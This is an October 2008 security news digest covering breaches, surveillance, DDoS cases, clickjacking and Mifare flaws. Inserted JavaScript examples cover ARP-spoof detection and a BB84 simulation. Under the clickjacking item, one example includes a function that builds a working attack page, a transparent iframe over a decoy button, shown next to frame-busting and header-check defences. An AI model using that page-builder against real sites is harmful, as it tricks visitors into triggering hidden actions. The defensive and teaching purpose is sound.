
1 DHS to Proceed With Spy-Satellite Surveillance Program Despite Privacy Concerns (October 1, 2008) The US Department of Homeland Security (DHS) plans to go ahead with the first phase of a satellite imagery program run by the National Applications Office (NAO) despite concerns that NAO may not comply with privacy laws. Through NAO, US government officials at the federal, state and local levels gain access to data gathered by spy satellites to help them with emergency response and domestic security issues. A recent report from the Government Accountability Office (GAO) says that there is no "assurance that NAO operations will comply with applicable laws and privacy and civil liberties standards." http://online.wsj.com/article/SB122282336428992785.html?mod=googlenews_wsj

2 Malicious Code Detected on South Korean Military Contractor Systems (October 1, 2008) Malicious code has been detected on the computer systems of two companies that provide weapons and vessels to the South Korean military. LIG Nex1, which manufactures guided missiles, discovered the code in March 2008; Hyundai Heavy Industries, a naval vessel manufacturer, found the code last month. The National Security Research Institute believes the people responsible for the code's presence likely used it to steal information. http://english.chosun.com/w21data/html/news/200809/200809290015.html http://www.scmagazineuk.com/South-Korean-defence-suppliers-uncover-malicious-code/article/118477/

3 Chinese Skype Users Under Surveillance (October 2 & 3, 2008) Researchers and human rights activists have uncovered a surveillance program in China that eavesdrops on the communications of Skype, which operates in China as TOM-Skype. The system looks for certain words and phrases that could indicate the conversations are addressing controversial political and social issues, including Falun Gong, democracy and powdered milk. The researchers discovered the surveillance system in September when one of them noticed that each time he typed in a certain word, the message was sent to a particular Internet address. He found that the messages were being stored on TOM Online computers. http://www.nytimes.com/2008/10/02/technology/internet/02skype.html?partner=rssnyt&emc=rss&pagewanted=print http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9116099&source=rss_topic17 http://www.vnunet.com/vnunet/news/2227440/chinese-government-spying-skype http://news.bbc.co.uk/2/hi/science/nature/7649761.stm

4 Denial-of-Service Vulnerability Found in TCP Stack (October 2, 2008) Swedish researchers Robert E. Lee and Jack Louis of the security firm Outpost24 have uncovered flaws in TCP stack implementations that could be exploited to create denial-of-service conditions. The attack can be carried out in less than five minutes and exploits the way a target allocates resources for a connection after a successful three-way handshake, so SYN-flood defenses such as SYN cookies do not help. The problem was discovered while the researchers were testing a port scanning tool. More information about the issue is expected to be presented at the T2'08 Information Security Conference later this month in Helsinki. http://www.securityfocus.com/brief/831 http://news.cnet.com/8301-1009_3-10056759-83.html?part=rss&subj=news&tag=2547-1009_3-0-20 http://www.heise-online.co.uk/security/Speculation-surrounds-DoS-vulnerability-in-the-TCP-protocol--/news/111651

5 Remote Tracking Software Used to Find Alleged Laptop Thief (October 1 & 2, 2008) A White Plains, NY man used remote tracking software to identify the person who stole his laptop computer. Jose Caceres's computer was stolen when he left it on top of his car while carrying items into his home. His initial attempts at using remote tracking software to find the culprit yielded little more than the thief's fondness for pornography, but eventually the suspect typed in his name and address while registering on a website. Caceres was able to provide police with adequate information for them to arrest Gabriel Mejia, who has been charged with grand larceny. http://www.theregister.co.uk/2008/10/02/laptop_theft_suspect_busted/print.html http://www.cnn.com/2008/TECH/10/01/laptop.tracker.ap/index.html?eref=rss_tech

6 Proposed Legislation Would Restrict US Border Searches of Electronic Devices (October 2, 2008) US legislators have introduced a bill that would rein in the broad power that the Department of Homeland Security (DHS) has granted border control agents in seizing and searching travelers' laptops and other electronic devices. The Travelers' Privacy Protection Act would require that DHS establish reasonable suspicion of wrongdoing before searching US residents' devices; it would also require that DHS have probable cause and a court order or a warrant to hold a device for more than 24 hours. There would be restrictions placed on the sharing of information gathered through the searches and DHS would be required to report to Congress on its border searches. http://news.cnet.com/8301-13578_3-10055020-38.html http://www.securityfocus.com/brief/832

7 Estonia's Cyber Security Policy (October 3, 2008) A year-and-a-half after suffering coordinated denial-of-service attacks against its government and commercial computer systems, Estonia has released a national cyber security strategy that includes details about the attacks and offers recommendations for preventing attacks in the future and for a global stance toward cyber security. The report identifies four "policy fronts": "application of a graduated system of security measures in Estonia; development of Estonia's expertise in and high awareness of information security to the highest standard of excellence; development of an appropriate regulatory and legal framework to support the secure and seamless operability of information systems; [and] promoting international cooperation aimed at strengthening global cyber security." http://www.zdnetasia.com/news/security/0,39044215,62046785,00.htm http://www.mod.gov.ee/static/sisu/files/Estonian_Cyber_Security_Strategy.pdf

8 Skype Acknowledges Message Filtering and Retention in China (October 3 & 6, 2008) Skype has acknowledged that instant messages sent over its service in China were tapped, but points the finger at its local partner, TOM Online. Skype has a filter in place in China to block sensitive keywords, but only last week found out that the filter had been modified to log the conversations in which the keywords appear. The issue was discovered by researchers at the Citizen Lab at the University of Toronto, who found the unsecured servers on which the messages were being stored. Skype has consulted with TOM on the matter and the security hole that allowed the researchers to read the stored messages has been closed. http://www.theregister.co.uk/2008/10/03/skype_coughs_to_china_test_tap/ http://www.heise-online.co.uk/security/Skype-admits-censorship-and-invasion-of-privacy-in-China--/news/111662 Supporting sites: http://www.greatfirewallofchina.org/ http://www.thedarkvisitor.com/2008/10/detailed-report-on-prcgov-monitoring-tom-skype/

9 80,000+ Websites Serving Drive-by Malware Attacks (October 3, 2008) More than 80,000 websites have been "modified with malicious content" that serves exploit code (from the Neosploit toolkit, according to The Register) to unpatched PCs of site visitors. A server containing administrative login credentials for more than 200,000 websites has been found, although not all of those sites are known to be infected with the malware. The infected sites include universities, Fortune 500 companies, government systems, and the US Postal Service. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9116138&source=rss_news http://www.theregister.co.uk/2008/10/03/neosploit_powered_mass_hack_attack/

10 US Financial Crisis Ripe Pickings for Scammers (October 2, 2008) The mergers and acquisitions of banks resulting from the US financial crisis have provided new opportunities for online scam artists. Attacks have been seen in which the customers of a bank are asked to provide account information and other personal details to the bank's new owner for verification purposes. Banks would not ask for such information online; it would be done through paper mail. http://news.cnet.com/8301-1009_3-10057180-83.html?part=rss&subj=news&tag=2547-1009_3-0-20

11 T-Mobile Acknowledges 2006 Loss of Customer Data (October 4 & 6, 2008) T-Mobile has acknowledged that a disk containing personally identifiable information of 17 million German customers was lost more than two years ago. T-Mobile is a subsidiary of Deutsche Telekom AG, which publicly acknowledged the data loss only after an article published in Der Spiegel indicated that the data were being offered for sale online. The data include names, addresses, email addresses and mobile phone numbers, but no bank account information. Those affected by the breach run the gamut from everyday citizens to politicians and celebrities. T-Mobile reported the loss to the state prosecutors as soon as it learned of the situation and started monitoring sites where such information might be offered for sale. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9116338&source=rss_topic17 http://www.theregister.co.uk/2008/10/06/t_mobile_records_lost/ http://www.dw-world.de/dw/article/0,2144,3690132,00.html

12 Stolen Laptop Holds Irish Health Service Executive Employee Data (October 3, 2008) A laptop stolen in Dublin, Ireland on September 17 contains personally identifiable information of several thousand Health Service Executive (HSE) staff. The compromised data include names, salaries and staff numbers; the data were not encrypted. Just weeks ago, several HSE data storage devices, including a laptop, a BlackBerry and a data disk, were stolen from a medical officer's home. After that theft, HSE committed to encrypt, within one month, all digital storage devices that contain personal and medical data. http://www.scmagazineuk.com/Irish-HSE-hit-by-laptop-theft/article/118714/

13 Two Indicted in Botnet Attack Case (October 3 & 6, 2008) A US federal grand jury has indicted two European men suspected of being involved in distributed denial-of-service (DDoS) attacks against the websites of two US satellite television equipment retailers in 2003. Lee Graham Walker of England and Axel Gembe of Germany could each face up to 15 years in prison if they are convicted of the charges of conspiracy and intentionally damaging a computer system. Both are presently still at large. Two other men, Saad (also called Jay) Echouafni and Paul Ashley, were charged in 2004 with conspiracy for the same attack. Ashley served two years for his role in the attacks; Echouafni fled the country that same year and remains a fugitive. The new indictment alleges Echouafni told Ashley to block access to rival sites Rapid Satellite and Weaknees. http://news.bbc.co.uk/2/hi/technology/7654357.stm http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9116204&source=rss_topic17 http://news.cnet.com/8301-1009_3-10058710-83.html?part=rss&subj=news&tag=2547-1009_3-0-20 http://www.theregister.co.uk/2008/10/03/walker_gembe_ddos_attacks_indictment/print.html

14 Reported Data Breaches in US on the Rise (October 6, 2008) According to statistics compiled by the Identity Theft Resource Center, there have been 516 reported consumer data breaches in the first nine months of 2008, exposing 30 million records; in 2007, the total number of reported breaches was 446. Extrapolated from the numbers so far this year, the total number of reported breaches in 2008 could top 680. Eighty percent of the breaches involved digital media; the remaining 20 percent involved data recorded on paper. Of the incidents this year, 36 percent occurred at businesses, 21 percent at educational institutions, and 16 percent on military or federal government systems. Twenty percent of the reported breaches were due to lost or stolen digital media storage devices, 17 percent were due to insider theft and 13 percent were exposed through hacking. http://voices.washingtonpost.com/securityfix/2008/10/516_data_breaches_in_2008_expo.html

15 Most Hotel Internet Connections for Guests are Not Adequately Secured (October 3, 2008) A study from the Cornell University School of Hotel Administration found that most hotels do not take adequate security precautions on the Internet connections they provide for their guests. The study compiles data from 147 written survey responses and from visits to 46 hotels. Twenty percent of the hotel networks use simple hub topologies; because a hub repeats every frame to every port, any guest can passively read other guests' traffic. Most of the other hotel networks channel guest traffic through switches or routers, which stop that passive sniffing but still leave guests exposed to man-in-the-middle attacks such as ARP spoofing by another guest on the same segment. The researchers recommend that hotels set up Virtual Local Area Networks (VLANs) to isolate guests from one another. http://www.gcn.com/online/vol1_no1/47290-1.html?topic=security http://www.hotelschool.cornell.edu/research/chr/pubs/reports/abstract-14928.html
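The man-in-the-middle the Cornell study warns about on switched guest networks, and a check that catches the usual way of doing it, as an added example (this is not code from the study or from any hotel vendor). On a hub, sniffing is passive and leaves no trace. On a switch the attacker instead answers ARP requests for the gateway's IP address with his own MAC, so other guests send their traffic to him first. A monitor that remembers which MAC answered for each IP (or is told the real gateway MAC) flags the moment a second MAC claims the same address. The record format and every address below are constructed for this example.

```javascript
// Added example, not from the Cornell study: detecting ARP spoofing on a shared
// guest LAN from a stream of ARP replies. Addresses and record format are made up.

// Parse one ARP reply record of the constructed form
//   "<hh:mm:ss> <sender_ip> is-at <sender_mac>"
// Returns null for lines that are not ARP records.
function parseArpReply(line) {
  const m = line.match(
    /^(\d{2}:\d{2}:\d{2})\s+(\d{1,3}(?:\.\d{1,3}){3})\s+is-at\s+([0-9a-f]{2}(?::[0-9a-f]{2}){5})$/i
  );
  return m ? { time: m[1], ip: m[2], mac: m[3].toLowerCase() } : null;
}

// Walk the replies in order. `pinned` maps IPs whose MAC is known for certain
// (the gateway, from the hotel's own inventory) to that MAC; every other IP is
// learned on first sight. Each reply that contradicts the expected MAC is an alert.
function detectArpSpoof(lines, pinned = {}) {
  const learned = {};
  const alerts = [];
  for (const line of lines) {
    const r = parseArpReply(line);
    if (!r) continue;                                  // skip non-ARP / malformed lines
    const expected = pinned[r.ip] || learned[r.ip];
    if (!expected) { learned[r.ip] = r.mac; continue; } // first claim for this IP
    if (expected !== r.mac) {
      alerts.push({ time: r.time, ip: r.ip, expected, got: r.mac });
    }
  }
  return alerts;
}

// Constructed capture: the real gateway (10.20.0.1) answers from aa:bb:cc:00:00:01,
// then the guest machine at 00:16:3e:11:22:33 starts answering for the gateway too.
const SAMPLE_REPLIES = [
  '09:00:01 10.20.0.1 is-at aa:bb:cc:00:00:01',
  '09:00:02 10.20.0.57 is-at 00:16:3e:11:22:33',
  '09:00:03 10.20.0.58 is-at 00:1c:b3:44:55:66',
  '09:00:09 10.20.0.1 is-at 00:16:3e:11:22:33',      // spoofed: gateway IP, guest MAC
  '09:00:10 10.20.0.1 is-at 00:16:3e:11:22:33',
  'not an ARP record at all',
];

// What the hotel (or a careful guest, via a static ARP entry) can pin in advance.
const GATEWAY_MAC = { '10.20.0.1': 'aa:bb:cc:00:00:01' };

console.log(detectArpSpoof(SAMPLE_REPLIES, GATEWAY_MAC));
```

Pinning matters: with only first-seen learning, an attacker who answers before the real gateway is learned as the gateway and never flagged. Neither version helps on a hub, where the attacker needs no forged reply at all; that, and the fact that guests cannot reach each other's ARP traffic once they sit in separate VLANs, is why the study's recommendation is per-guest isolation rather than monitoring.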

16 Mifare Classic RFID Vulnerability Research Published (October 6, 2008) A research paper detailing security vulnerabilities in the Mifare Classic RFID chip has been published. The research, conducted by Professor Bart Jacobs and his colleagues at Radboud University Nijmegen in the Netherlands, was set to be published earlier this year, but NXP, the company that manufactures the Mifare Classic chip, sought an injunction to delay the paper's dissemination to allow customers time to make changes to their security systems; a Dutch court refused the injunction, and the paper was presented at the ESORICS 2008 conference. The weaknesses lie in the chip's proprietary CRYPTO1 stream cipher and its weak random number generator, which together let an attacker recover a card's keys and clone it. The chip is used in prepaid transportation cards in London, Boston and the Netherlands and is also used to restrict access to some buildings. http://news.bbc.co.uk/2/hi/programmes/click_online/7655292.stm http://www.theregister.co.uk/2008/10/06/mifare_hack_finally_published/

17 US Army Program Seeks Out Unauthorized Applications (October 7, 2008) The US Army Information Management Support Center has put software on 11,000 desktop computers that will detect unauthorized applications. Any that are discovered are reported to the Configuration Control Board, which also lets the user know what has occurred. In some cases, users have the opportunity to explain why the application is on the computer. If the application is deemed unnecessary, it can be removed remotely. http://www.networkworld.com/news/2008/100708-army-desktop-software.html?fsrc=netflash-rss

18 Clickjacking Proof-of-Concept Demos Posted (October 7, 8 & 9, 2008) More information about clickjacking vulnerabilities has been released. Researchers Jeremiah Grossman and Robert Hansen had planned to present the attack technique at the OWASP AppSec conference in New York several weeks ago, but withheld most of their talk to allow vendors time to address the flaws in their products. In a clickjacking attack, the attacker loads a target site inside a transparent frame positioned over a decoy page, so that a visitor who believes they are clicking something innocuous is actually operating a control on the hidden page. This week, proof-of-concept demonstrations were posted to the Internet, including one that uses the technique to switch on a visitor's webcam and microphone through the Adobe Flash Player settings dialog. The most recent version of NoScript, the Firefox add-on, includes a ClearClick feature that warns users when a click would land on an obscured element. http://blogs.zdnet.com/security/?p=2005&tag=nl.e539 http://news.zdnet.co.uk/security/0,1000000189,39500483,00.htm http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9116638&source=rss_topic17 http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9116800 http://www.vnunet.com/vnunet/news/2227827/adobe-warns-clickjacking
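What a clickjacking page looks like, and the two defences a site owner has, as an added example (not code from the researchers' demonstrations or from NoScript). The attacker page stacks a fully transparent frame of the victim site on top of a visible decoy button, shifted so the victim's real button sits exactly under the decoy. The victim-side defence available in 2008 was "frame busting" in JavaScript; the header-based defences (X-Frame-Options, introduced with IE8 in 2009, and later CSP frame-ancestors) postdate these demos but are what a reviewer asks for today. Everything runs under Node; the window-like objects, the victim URL and the pixel offsets are stand-ins chosen for this example.

```javascript
// Added example, not from the original article: clickjacking attack page, the
// 2008-era frame-busting defence, and a header check for the later defences.

// Attacker page. The victim's sensitive button is at (victimX, victimY) inside
// the framed page; the frame is offset so that point lands under the decoy, and
// because the frame is transparent but stacked highest, the click goes to it.
// victimUrl and the coordinates are assumptions for illustration.
function buildClickjackPage(victimUrl, victimX, victimY) {
  const decoyX = 200, decoyY = 150;   // where the visible decoy is drawn
  return [
    '<!doctype html><html><body>',
    `<button style="position:absolute;left:${decoyX}px;top:${decoyY}px;">Claim prize</button>`,
    `<iframe src="${victimUrl}" scrolling="no" style="position:absolute;` +
      `left:${decoyX - victimX}px;top:${decoyY - victimY}px;` +
      'width:1024px;height:768px;opacity:0;z-index:10;border:0;"></iframe>',
    '</body></html>',
  ].join('\n');
}

// Victim-side defence of the time: frame busting. `win` is a window-like object
// with `top`, `self` and `location` (in a browser, pass `window`). If the page
// is framed, it navigates the top-level window to itself, escaping the frame.
// Known weakness: a hostile parent can block the navigation (onbeforeunload
// tricks, frame sandboxing), which is why header-based defences replaced it.
function frameBust(win) {
  if (win.top === win.self) return 'not-framed';
  win.top.location = win.self.location;
  return 'busted';
}

// Server-side check: does an HTTP response carry a framing-control header?
// Returns 'xfo:<value>', 'csp:<frame-ancestors sources>' or 'none'.
function framingProtection(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN' || xfo.startsWith('ALLOW-FROM')) {
    return `xfo:${xfo}`;
  }
  const csp = h['content-security-policy'] || '';
  const m = csp.match(/frame-ancestors\s+([^;]+)/i);
  if (m) return `csp:${m[1].trim()}`;
  return 'none';
}

// Stand-alone demonstration with mocked windows.
const attackerTop = { location: 'http://attacker.example/win.html' };
const framedVictim = { location: 'http://victim.example/transfer', top: attackerTop };
framedVictim.self = framedVictim;
console.log(buildClickjackPage('http://victim.example/transfer', 300, 400));
console.log(frameBust(framedVictim), '->', attackerTop.location);
console.log(framingProtection({ 'X-Frame-Options': 'deny' }));
```

The header check is the one to wire into a scanner: a response with neither header is frameable by any origin, which is exactly the precondition the posted demos rely on.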

19 Quantum Encryption-Protected Network Debuted at Conference (October 9, 2008) Scientists at the SECOQC conference in Vienna, Austria demonstrated the first computer network protected by quantum key distribution (QKD). The six nodes of the network are connected by fiber optic cables. QKD does not itself encrypt traffic; it lets two parties agree on a secret key, which then drives a conventional cipher. Its security rests on the fact, often described in terms of the Heisenberg Uncertainty Principle, that quantum information cannot be measured without disturbing it: an eavesdropper who intercepts the photons carrying the key introduces errors that the two parties detect when they compare a sample of their key over a public channel, so a tapped key is discarded before it is ever used. http://news.bbc.co.uk/2/hi/science/nature/7661311.stm
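The detection property described above, worked through in a toy BB84 simulation as an added example (this is not code from the SECOQC project, and it models nothing about their hardware). Alice sends bits encoded in one of two randomly chosen bases, Bob measures in his own random bases, and after sifting out the mismatched bases the two compare a sample of their key. With an ideal channel the sifted keys agree exactly; an intercept-and-resend eavesdropper who measures every photon guesses the wrong basis half the time and so corrupts about a quarter of the sifted key, far above the roughly 11 percent error rate at which BB84 post-processing can still distil a secure key. Assumptions: lossless, noiseless channel, one bit per photon, and a seeded PRNG so the run is reproducible.

```javascript
// Added example, not from the article or SECOQC: BB84 with and without an
// intercept-resend eavesdropper, showing the error rate that exposes her.

// Small seeded PRNG (xorshift32) so the run is deterministic.
function makeRng(seed) {
  let s = (seed >>> 0) || 1;
  return () => {
    s ^= s << 13; s >>>= 0;
    s ^= s >>> 17;
    s ^= s << 5;  s >>>= 0;
    return s / 0x100000000;          // uniform in [0, 1)
  };
}

// A photon carries one bit in a basis: 0 = rectilinear (+), 1 = diagonal (x).
// Measuring in the matching basis returns the bit; the other basis gives a
// uniformly random bit and destroys the original state.
function measure(photon, basis, rnd) {
  return photon.basis === basis ? photon.bit : (rnd() < 0.5 ? 0 : 1);
}

// Run BB84 for n photons. With eve=true every photon is intercepted, measured
// in a random basis and re-sent in that basis (intercept-resend attack).
function bb84(n, { eve = false, seed = 1 } = {}) {
  const rnd = makeRng(seed);
  const coin = () => (rnd() < 0.5 ? 0 : 1);
  const aliceBits = [], aliceBases = [], bobBases = [], bobBits = [];
  for (let i = 0; i < n; i++) {
    let photon = { bit: coin(), basis: coin() };
    aliceBits.push(photon.bit);
    aliceBases.push(photon.basis);
    if (eve) {
      const eveBasis = coin();
      photon = { bit: measure(photon, eveBasis, rnd), basis: eveBasis };
    }
    const bobBasis = coin();
    bobBases.push(bobBasis);
    bobBits.push(measure(photon, bobBasis, rnd));
  }
  // Sifting: bases are compared over the public channel; only matches are kept.
  const aliceKey = [], bobKey = [];
  for (let i = 0; i < n; i++) {
    if (aliceBases[i] === bobBases[i]) {
      aliceKey.push(aliceBits[i]);
      bobKey.push(bobBits[i]);
    }
  }
  // Error estimate over the sifted key (a real run sacrifices a public sample;
  // here the whole key is compared so the rate is exact).
  let errors = 0;
  for (let i = 0; i < aliceKey.length; i++) if (aliceKey[i] !== bobKey[i]) errors++;
  const qber = aliceKey.length ? errors / aliceKey.length : 0;
  return { sifted: aliceKey.length, errors, qber, aliceKey, bobKey };
}

// Decision rule: above the threshold the key is discarded as tapped.
// 11% is the usual QBER bound for BB84 with one-way error correction and
// privacy amplification.
function keyAccepted(result, threshold = 0.11) {
  return result.qber <= threshold;
}

const clean = bb84(4000, { eve: false, seed: 7 });
const tapped = bb84(4000, { eve: true, seed: 7 });
console.log('no eavesdropper: sifted', clean.sifted, 'QBER', clean.qber.toFixed(3), 'accepted', keyAccepted(clean));
console.log('intercept-resend: sifted', tapped.sifted, 'QBER', tapped.qber.toFixed(3), 'accepted', keyAccepted(tapped));
```

In practice the channel itself contributes a few percent of errors, so the threshold is what separates "noisy fiber" from "someone is measuring the photons"; an eavesdropper who measures only a fraction of the photons adds proportionally less error, and that fraction bounds how much of the key she can have learned, which is what privacy amplification then squeezes out.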

20 Man Admits Role in Phishing Scheme (October 7 & 9, 2008) Sergiu Daniel Popa of Romania has admitted that he was part of a phishing scheme that stole US $700,000 over a three-year period. He pleaded guilty to possession of unauthorized access devices and aggravated identity theft. Popa lived in the US for nearly seven years; he was extradited from Spain in June to face the charges. Popa faces up to 10 years in prison and a US $500,000 fine. According to his plea agreement, Popa stole identities of more than 7,000 people. http://www.theregister.co.uk/2008/10/09/romanian_phishing_guilty_plea/ http://www.startribune.com/local/30566739.html?elr=KArksLckD8EQDUoaEyqyP4O:DW3ckUiD3aPc:_Yyc:aU7EaDiaMDCiUT

21 Alleged Palin eMail Hacker Indicted (October 8 & 9, 2008) A federal grand jury has indicted Tennessee college student David Kernell on one count of accessing a computer without authorization for allegedly breaking into Alaska Governor Sarah Palin's Yahoo! email account. Kernell has pleaded not guilty; if he is convicted, he could face up to five years in prison and a US $250,000 fine. The attacker used the password reset feature to gain access to Governor Palin's account, reportedly answering the account's security questions from publicly available information about the governor, and posted several of the email messages online. Records from the proxy service the attacker used linked the suspicious activity to Kernell through an IP address. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9116606&source=rss_topic17 http://news.bbc.co.uk/2/hi/americas/7661117.stm http://knoxville.fbi.gov/dojpressrel/2008/kxhacking100808.htm

22 Temporary Drop in Spam Volume Linked to Atrivo Going Offline (October 9, 2008) According to a report from MessageLabs, when upstream providers cut off service to California-based Internet service provider (ISP) Atrivo, also known as Intercage, the amount of detected spam and botnet activity dropped significantly for several days. Atrivo was notorious for providing service to numerous scammers and cyber criminals. The decline will likely be short-lived as the scammers search out alternate providers, but the temporary drop indicates that the charges leveled at Atrivo were on the mark. http://voices.washingtonpost.com/securityfix/2008/10/spam_volumes_plummet_after_atr.html?nav=rss_blog

23 Spammers Ordered to Pay US $236 Million (October 8, 2008) A US District Judge in Iowa has ordered Henry Perez and Suzanne Bartok of Arizona to pay US $236 million for sending millions of unsolicited commercial emails. Robert Kramer, the owner of Iowa-based CIS Internet Services, sued Perez and Bartok, who ran a company called AMP Dollar Savings, for inundating his network with spam. Perez and Bartok used a program called "Bulk Mailing 4 Dummies" to send out messages that advertised home mortgage refinancing. http://www.theregister.co.uk/2008/10/08/mom_and_pop_spammer_judgement/

24 Asus Acknowledges That Malware Shipped on Eee Box Computers (October 9, 2008) Asus is warning its customers in Japan of malware on recently shipped Eee Box desktop computers running Windows. The virus resides on the D drive in a file called recycled.exe. When the D drive is opened, the virus starts copying itself onto the C drive and all connected USB media. Asus has not said how the malware came to be on the drive. The malware is old enough that it should be detected by most anti-virus programs. http://www.heise-online.co.uk/security/Asus-warns-of-a-virus-infection-in-shipping-Eee-Boxes--/news/111691 http://blogs.zdnet.com/security/?p=2016 http://www.vnunet.com/vnunet/news/2227855/asus-warns-infected-eee-box-pcs

25 Contractor Allegedly Accessed Shell Oil Employee Database (October 6, 7 & 8, 2008) Shell Oil has warned its employees that their personal information may have been compromised. An employee of a third-party contractor working on-site for Shell was escorted off the premises after it emerged that the individual had allegedly accessed a database containing personally identifiable information of most current and former Shell employees. Shell has noted that in four instances, employees' Social Security numbers (SSNs) were used to file phony unemployment claims. Shell has terminated its contract with the third-party company. http://www.theregister.co.uk/2008/10/07/shell_oil_database_breach/ http://news.zdnet.co.uk/security/0,1000000189,39499984,00.htm http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=cybercrime_and_hacking&articleId=9116421&taxonomyId=82&intsrc=kc_top

26 Missing MOD Hard Disk Contains 1.5m Pieces of Personal Information (October 11, 2008) The UK's Ministry of Defence has admitted to losing a portable hard drive containing up to 1.5 million pieces of personal information, including details of over 100,000 serving personnel and 600,000 recruits. The missing disk was not encrypted. Of particular concern, the missing data include details on personnel who served in Northern Ireland and may be terrorist targets. The lost information includes passport numbers, addresses, dates of birth and in some cases banking details. The portable disk was being held by EDS, the MOD's main IT contractor, which reported the drive missing after an audit carried out on October 8. Over the past four years 658 laptops have gone missing from the MOD, along with 26 memory sticks containing sensitive information since January 2008. http://news.bbc.co.uk/2/hi/uk_news/7662604.stm http://www.theregister.co.uk/2008/10/10/mod_data_loss/

27 New Anti-Piracy Law Imposes Stronger Penalties (October 13, 2008) US President George W. Bush has signed into law the Prioritizing Resources and Organization for Intellectual Property Act (PRO-IP), which imposes more stringent penalties on people convicted of music and movie piracy. The bill creates an executive-level position, Intellectual Property Enforcement Coordinator, who will advise the White House on protecting both domestic and international IP. The law has the backing of the Recording Industry Association of America (RIAA) and the Motion Picture Association of America (MPAA) as well as of the US Chamber of Commerce. The US Justice Department opposed the creation of the IP czar, saying such a position would undermine its authority. http://uk.reuters.com/article/technologyNews/idUKTRE49C7EI20081013 http://news.cnet.com/8301-13578_3-10064527-38.html http://www.pcmag.com/article2/0,2817,2332432,00.asp

28 World Bank Servers Have Been Attacked a Half-Dozen Times in the Last Year (October 10 & 12, 2008) The World Bank Group's computer network has reportedly come under attack at least half a dozen times since the middle of 2007. At least 18 servers were compromised. A World Bank spokesperson said "that at no point in time was any sensitive information accessed." However, it is nearly impossible to determine whether data were stolen, and attackers are known to install malware that collects sensitive information and seeks out other vulnerable computers on the network. Internet Storm Center: http://isc.sans.org/diary.html?storyid=5161 http://www.foxnews.com/story/0,2933,435681,00.html http://news.cnet.com/8301-1009_3-10063522-83.html?part=rss&subj=news&tag=2547-1009_3-0-20 http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9116933&source=rss_topic17 http://www.usatoday.com/money/industries/banking/2008-10-12-world-bank-hackers_N.htm?csp=34

29 Allegations of Wiretapping Improprieties at NSA Facility (October 10, 2008) Three former workers at the National Security Agency (NSA)'s wiretapping facility at Fort Gordon, Georgia between 2001 and 2007 have alleged that US spies listened to personal conversations of Americans living abroad and on occasion shared the conversations they heard with each other. The employees say there was scant supervision and conflicting instructions regarding expectations. Senate Intelligence Committee Chairman John D. Rockefeller IV (D-W.Va.) says his staff is gathering more information about the allegations and may hold hearings. http://www.washingtonpost.com/wp-dyn/content/article/2008/10/09/AR2008100902953_pf.html http://blog.wired.com/27bstroke6/2008/10/kinne.html

30 Bugged Chip-and-Pin Machines Stealing Payment Card Data (October 10 & 11, 2008) Crime syndicates with members in China and Pakistan have managed to place devices in chip-and-pin machines that steal payment card data. The devices were planted in the machines before they were sent from China to stores in England, Ireland, Denmark, Belgium and the Netherlands. The stolen information was sent over mobile phone networks to people in Pakistan who then used the cards to make fraudulent purchases and withdrawals. The simplest way of determining if a given machine has data stealing capabilities is to weigh it; the devices add several ounces to each of the machines. The attack has been going on for nine months; losses are estimated to be between US $50 million and US $100 million, but could ultimately be higher. http://www.telegraph.co.uk/news/newstopics/politics/lawandorder/3173346/Chip-and-pin-scam-has-netted-millions-from-British-shoppers.html http://online.wsj.com/article/SB122366999999723871.html

31 Counterfeit Cisco equipment (October 10, 2008) The FBI has been investigating instances of counterfeit Cisco networking and computer gear having been sold to the Department of Defense. The threat posed by outsourced electronic parts, whose provenance cannot be verified once they enter the supply chain, is real.

32 Man Behind CastleCops DDoS Attack Draws Two-Year Sentence (October 8 & 13, 2008) Gregory King has been sentenced to two years in prison and ordered to pay more than US $69,000 in restitution for launching distributed denial-of-service (DDoS) attacks against the CastleCops and KillaNet technologies websites. The attacks took place in early 2007 and caused an estimated US $70,000 in damage. King admitted to the attacks in June. He had faced a maximum sentence of 20 years in prison and a fine of half-a-million dollars, but prosecutors agreed to a reduced sentence in exchange for guilty pleas to two felony counts of transmitting code to cause damage to protected computers. http://www.theregister.co.uk/2008/10/13/castlecops_attacker_sentenced/ http://www.centralvalleybusinesstimes.com/stories/001/?ID=10031

33 TIGTA Report Finds Lack of Management Control on Some Computer Systems (October 9, 2008) According to a report from the Treasury Inspector General for Tax Administration (TIGTA), three computer systems at the US Internal Revenue Service (IRS) Office of Research, Analysis and Statistics lack adequate access management controls. The IRS's security policies were found to be adequate, but enforcement needs improvement. The report found there to be insufficient guidance and compliance oversight of IRS security policies; in addition, no vulnerability scanning software had been deployed. Eleven percent of employees on the systems reviewed were permitted access without required authorization from managers; systems were not configured to disable inactive accounts. http://www.nextgov.com/nextgov/ng_20081009_3974.php http://www.treas.gov/tigta/auditreports/2008reports/200820176fr.pdf

34 Malware-Laden Spam Pretends to be Windows Security Update (October 11, 2008) New spam messages are spreading, purporting to contain "an experimental private version of an update for all Microsoft Windows OS users." While there is nothing new about malware spreading in the guise of security updates, the fact that these messages are arriving just as Microsoft is scheduled to release its October update makes it more likely that the attackers will have a greater level of success. The executable file attached to the message infects users' computers with malware. The spam offers several clues that it is not legitimate; the grammar is dodgy and the message claims that the update addresses versions of Windows that are no longer supported and for which patches would not therefore be issued. Microsoft never sends security updates as email attachments. http://www.vnunet.com/vnunet/news/2228041/malware-writers-spoof-patch

